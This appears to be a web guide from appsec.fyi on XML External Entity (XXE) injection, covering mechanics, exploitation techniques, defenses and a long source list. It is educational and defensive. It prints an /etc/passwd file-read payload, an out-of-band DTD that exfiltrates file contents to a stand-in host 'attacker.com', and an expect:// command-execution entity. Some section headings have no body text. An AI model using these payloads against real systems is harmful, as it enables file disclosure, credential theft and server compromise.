appsec.fyi

XXE — A Practical Guide

A curated AppSec resource library covering XSS, SQLi, SSRF, IDOR, RCE, XXE, OSINT, and more.

XXE: A Practical Guide

Curated and synthesized by . Last updated 2026-10-01. Synthesized from 86 of 86 curated resources. Browse all 86 XXE resources →

Problem Framing

XML External Entity (XXE) injection remains a persistent and potent threat in modern application security. Despite its age and extensive documentation, the vulnerability continues to be widely discovered, often with critical implications. At its core, XXE exploits the XML parser's ability to process external entity declarations, allowing attackers to coerce the application into fetching and processing arbitrary content accessible via the server's context. This can range from trivial local file disclosure to complex server-side request forgery (SSRF), denial-of-service (DoS) conditions, and even remote code execution (RCE) [1][2][3].

The prevalence of XXE is directly tied to the pervasive use of XML in various application functionalities. From configuration files and data exchange formats (like SOAP) to document processing (e.g., Office Open XML formats like DOCX, XLSX) and image parsing (SVG), XML parsers are ubiquitous. Many of these parsers, especially older versions or those configured with insecure defaults, can be tricked into resolving external entities pointing to sensitive local files, internal network resources, or even attacker-controlled endpoints [4][5][6][3][7].

The challenge for practitioners lies not only in understanding the fundamental mechanics of XXE but also in recognizing its diverse attack vectors and the sophisticated techniques employed by attackers to bypass defenses. The landscape of XXE exploitation has evolved significantly, moving beyond simple in-band retrieval to more advanced blind and out-of-band (OOB) techniques designed to exfiltrate data when direct responses are not available [8][9][10][11].

Core Mechanics

XXE vulnerabilities stem from the way XML parsers handle external entities. An XML document can define a Document Type Definition (DTD), which can, in turn, define entities. These entities act as shortcuts or variables that can represent strings, XML markup, or, crucially for XXE, external resources referenced by a URI [12][13][3].

A basic XXE payload leverages the SYSTEM keyword within an entity declaration to reference a URI. This URI can point to a local file using the file:// scheme or a remote resource via http://, ftp://, or other protocols [1][13]. When the XML parser encounters such an entity reference in the processed XML, it attempts to dereference the URI, fetch the content, and substitute it for the entity. If this process is not properly secured, the retrieved content can be exposed to the attacker.

A canonical example illustrates this:

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <foo>&xxe;</foo>

In this payload, the &xxe; entity is defined to fetch the content of /etc/passwd. When the application's XML parser processes this, it will attempt to read the file and, if the result is reflected in the response, the attacker gains access to the password hash file [13][7].

This fundamental mechanism can be extended and manipulated in numerous ways, forming the basis for more complex attacks. The key to exploitation lies in identifying an input vector that accepts XML and a parser that is configured to resolve external entities.

Notable Techniques

The evolution of XXE exploitation has led to a sophisticated array of techniques used to bypass security controls and achieve various objectives.

File Disclosure

The most straightforward application of XXE is reading local files. Attackers commonly target sensitive system files such as /etc/passwd and /etc/shadow on Unix-like systems, or C:\Windows\win.ini and registry keys on Windows [1][13][3].

Beyond system files, attackers can target application configuration files (e.g., database credentials, API keys), source code, or even cloud metadata endpoints (e.g., AWS EC2 instance metadata services) [1][14][15][3].

Server-Side Request Forgery (SSRF)

XXE can be leveraged to force the vulnerable server to make arbitrary HTTP requests to internal or external resources. This is invaluable for internal network reconnaissance, port scanning, and interacting with internal services that are not directly exposed to the internet [16][1][2][3][7]. For example, an attacker could try to access http://internal-service:8080/admin to check if an internal administrative interface is reachable [7].

Blind XXE and Out-of-Band (OOB) Exfiltration

In scenarios where the application does not directly reflect the results of entity expansion in its response (blind XXE), attackers must employ out-of-band techniques to exfiltrate data. This involves forcing the vulnerable server to make an external network request to a server controlled by the attacker [8][9][10][11].

A common method is to host a malicious DTD file on an attacker-controlled server. This DTD can contain logic to read a local file and then embed its content into a URL that the vulnerable server will request. This can be achieved using parameter entities and string concatenation.

A typical malicious DTD might look like this:

<!ENTITY % file SYSTEM "file:///etc/passwd">

<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>"> %eval; %exfiltrate;

When referenced in an XXE payload, the vulnerable server fetches this DTD, reads /etc/passwd, and then sends its content as a query parameter to http://attacker.com/ [9][10][11].

Protocol Exploitation

Beyond HTTP, XXE can exploit other protocols if supported by the XML parser and the underlying Java runtime or application environment. These include:

PHP Wrapper Exploitation (RCE)

In PHP environments where specific extensions are enabled, XXE can be escalated to Remote Code Execution (RCE). The expect:// wrapper, for instance, allows arbitrary command execution. By crafting an entity like SYSTEM "expect://id", an attacker can execute system commands on the server [14][22][13][23]. This can further be used to download and execute a web shell for persistent access [14][22].

File Upload Vectors

XXE vulnerabilities are not limited to direct XML input. File upload functionalities that process XML-based formats present significant attack surfaces.

XML Parameter Entities vs. General Entities

When standard entities are blocked, XML parameter entities (declared with % and referenced with %) can sometimes bypass restrictions, particularly within DTDs. This is crucial for complex OOB exfiltration and blind XXE techniques [8][9][6][10][11].

Local DTD Exploitation

When external DTDs are blocked, but local DTD files exist on the server, attackers can sometimes repurpose these local DTDs to achieve XXE. This involves injecting content into local DTDs that redefine existing entities, leading to file disclosure or SSRF [29][20][11].

Detection & Prevention

The primary defense against XXE is to disable the processing of external entities entirely. This is typically achieved by configuring the XML parser securely.

Disabling External Entity Processing

Input Validation and Sanitization

While not a primary defense, validating and sanitizing XML input can act as a secondary layer. However, reliance solely on sanitization is discouraged, as XML's complexity makes it difficult to create foolproof filters [13][27].

Web Application Firewalls (WAFs)

WAFs can be configured with rules to detect and block common XXE patterns, such as DOCTYPE, SYSTEM, and ENTITY keywords within XML payloads [4][31][13][27]. However, attackers can often bypass WAFs through encoding, character variations, or by using less common protocols or DTD structures [29].

Dependency Management

Ensure that all XML parsing libraries and frameworks are kept up-to-date to benefit from security patches and default secure configurations [5][3][25].

Limiting Permissions

The principle of least privilege should be applied to the application process running the XML parser. This limits the impact of a successful XXE attack by restricting access to sensitive files and network resources [32].

Tooling

Several tools assist in the discovery and exploitation of XXE vulnerabilities:

Recent Developments

Recent discoveries highlight the continued relevance and evolving attack vectors of XXE:

These examples underscore that XXE remains a significant threat, particularly in applications that process user-supplied XML or XML-based file formats, and where XML parsers are not configured with secure defaults.

Where to Go Deeper

For a comprehensive understanding and advanced exploitation techniques, the following resources are highly recommended:

Sources cited in this guide

  1. XXE Vulnerability Guide 2025: How XML Attacks Still Threaten — instatunnel.my
  2. XXE Complete Guide: Impact, Examples, and Prevention — hackerone.com
  3. XML External Entity: The Ultimate Bug Bounty Guide to XXE | YesWeHack — yeswehack.com
  4. The File That Answered Back — XXE Hidden in Cell A2 — infosecwriteups.com
  5. Critical Apache Tika Vulnerability Leads to XXE Injection — securityweek.com
  6. XXE Injection: Advanced Exploitation Guide — intigriti.com
  7. https://portswigger.net/web-security/xxe — portswigger.net
  8. Blind XXE Attacks: Out of Band Interaction Techniques to Exfiltrate Data — shreyapohekar.com
  9. Exploiting Blind XXE: Data Exfiltration Through External DTD — medium.com
  10. Blind XXE: Exfiltrating Data Out-of-Band in 2025 — instatunnel.my
  11. What is a Blind XXE Attack? | PortSwigger — portswigger.net
  12. A Deep Dive Into XXE Injection (Synack) — synack.com
  13. XML External Entity (XXE) Processing | OWASP — owasp.org
  14. Advanced XXE Exploitation: File Disclosure, Blind OOB, and RCE — github.com
  15. Exploiting XXE for SSRF. Retrieving IAM credentials of EC2… | by Gupta Bles — medium.com
  16. CVE-2025-30220: GeoServer WFS Service XML External Entity — miggo.io
  17. XXE - Things Are Getting Out of Band — blog.zsec.uk
  18. h3xStream's blog: Identifying Xml eXternal Entity vulnerability (XXE) — blog.h3xstream.com
  19. XXE - Things Are Getting Out of Band — blog.zsec.uk
  20. From blind XXE to root-level file read access – Honoki — honoki.net
  21. BuffaloWill/oxml_xxe: A tool for embedding XXE/XML exploits into different — github.com
  22. Advanced XXE Exploitation: File Disclosure, Blind OOB, and RCE — github.com
  23. XML External Entity Prevention · OWASP Cheat Sheet Series — cheatsheetseries.owasp.org
  24. Exploiting XXE via File Uploads (SVG, XLSX, DOCX) — exploit-db.com
  25. 10 Types of Web Vulnerabilities that are Often Missed - Detectify Labs — labs.detectify.com
  26. GitHub - whitel1st/docem: A tool to embed XXE and XSS payloads in docx, odt, pptx, xlsx files (oxml_xxe on steroids) — github.com
  27. XML External Entity (XXE) Attack Guide | Hackviser — hackviser.com
  28. Critical Apache Tika CVE-2025-66516: XXE Vulnerability — rescana.com
  29. https://www.noob.ninja/2019/12/spilling-local-files-via-xxe-when-http.html — noob.ninja
  30. CVE-2025-27136: LocalS3 CreateBucketConfiguration XXE Injection — offsec.com
  31. CVE-2025-11035: Jinher OA XXE Vulnerability — sentinelone.com
  32. CVE-2025-54254: Adobe Experience Manager Forms XXE Vulnerability — sentinelone.com
  33. https://www.hackingarticles.in/burp-suite-for-pentester-hackbar/ — hackingarticles.in
  34. Exploiting Out-Of-Band XXE on Wildfire — dhiyaneshgeek.github.io
  35. Tool for automatic exploitation of XXE vulnerability using direct and diffe — github.com
  36. If you find powerful OXML XXE tool? it’s “DOCEM” — hahwul.com
  37. XXExploiter — github.com
  38. GeoNetwork - Pre-Auth RCE via Unauthenticated File Upload and Unsafe XSLT Processor (4 CVEs, 121 government deployments, all patched) — ethiack.com
  39. XXE in GeoServer WFS Service (CVE-2025-30220) — kudelskisecurity.com
  40. Pre-auth XXE → HTTP SSRF on ArubaOS 8.13.2 closed as "theoretical / no valid PoC" despite TCP pcap, sshd localhost log, and internal port scan — documenting for community review — netacoding.com
  41. GeoServer 2025 XXE Vulnerability (CVE-2025-58360) Explained — motasemhamdan.medium.com
  42. CVE-2025-49493: XXE in Akamai CloudTest — xbow.com
  43. Comprehensive Guide to XXE Exploitation: Advanced Data Exfiltration and RCE — nullsecurityx.codes
  44. XXE Injection in langchain-community (CVE-2025-6984) — security.snyk.io
  45. PortSwigger Blind XXE Lab Write-up — halleffect.medium.com
  46. Blind XXE Lab: Exfiltrate Data Using Malicious External DTD — portswigger.net
  47. Hacking Millions of Modems (and Investigating Who Hacked My Modem) — samcurry.net
  48. Rapid7 Analysis: CVE-2022-28219 — rapid7.com
  49. CVE-2024-30043: Exploiting XXE on SharePoint via Confused URL Parsing (PoC) — github.com
  50. CVE-2025-66516: Detecting and Defending Against Apache Tika XXE — akamai.com
  51. IBM Business Automation Workflow XXE (CVE-2025-13096) — ibm.com
  52. XXElixir: Tool for Testing XXE via XLSX File Upload Poisoning — github.com
  53. XXE-OOB-Exfiltrator: Multi-line Content Exfiltration via External DTD — github.com
  54. Out-of-Band XML External Entity (OOB XXE) — invicti.com
  55. How to Find XXE Bugs: Severe, Missed, and Misunderstood — bugcrowd.com
  56. Top 25 XXE Bug Bounty Reports — corneacristian.medium.com
  57. XXE in Apache Struts CVE-2025-68493 — sangfor.com
  58. Out-of-Band XXE Attack with Sensitive Data Exfiltration — masterck.medium.com
  59. XXE Injection Overview — medium.com
  60. Cisco ISE XXE Information Disclosure — sec.cloudapps.cisco.com
  61. CVE-2026-29924: XXE Vulnerability — tenable.com
  62. CVE-2026-34401: XXE in Wwbn Avideo — mondoo.com
  63. What is XXE (XML External Entity) | Examples & Prevention | Imperva — imperva.com
  64. XML External Entities (XXE) | Pentesting Notes — notes.sfoffo.com
  65. https://www.slideshare.net/ssuserf09cba/xxe-how-to-become-a-jedi — slideshare.net
  66. Hunting in the Dark - Blind XXE — blog.zsec.uk
  67. GDS - Blog - Automated Data Exfiltration with XXE — blog.gdssecurity.com
  68. Advice From A Researcher: Hunting XXE For Fun and Profit — blog.bugcrowd.com
  69. GDS - Blog - Automated Data Exfiltration with XXE — blog.gdssecurity.com
  70. https://www.hahwul.com/2019/09/28/oxml-xxe-payload-inject-tool-docem/ — hahwul.com
  71. Awesome Bug Bounty Tools — github.com
  72. https://gosecure.github.io/xxe-workshop/#0 — gosecure.github.io
  73. XXE-study/xxe.php at master · HLOverflow/XXE-study — github.com
  74. XXE - XEE - XML External Entity - HackTricks — book.hacktricks.xyz
  75. Exploiting The Entity: XXE (XML External Entity Injection) - Pentestmag — pentestmag.com
  76. XXE - XML External Entity Attack — slideshare.net
  77. XXE at Bol.com – Jonathan Bouman – Medium — medium.com
  78. XXE : From Zero to Hero — infosecwriteups.com
  79. How to Protect Text Input from XML External Entity (XXE) Attacks using Pyth — cloudmersive.medium.com
  80. XXE : From Zero to Hero — medium.com
  81. XXE attacks 😈 — link.medium.com
  82. Exploiting The Entity: XXE (XML External Entity Injection) - Pentestmag — pentestmag.com
  83. Advice From A Researcher: Hunting XXE For Fun and Profit — blog.bugcrowd.com
📚 This guide is synthesized from the full text of resources curated in the XXE library, and refreshed as new material is added.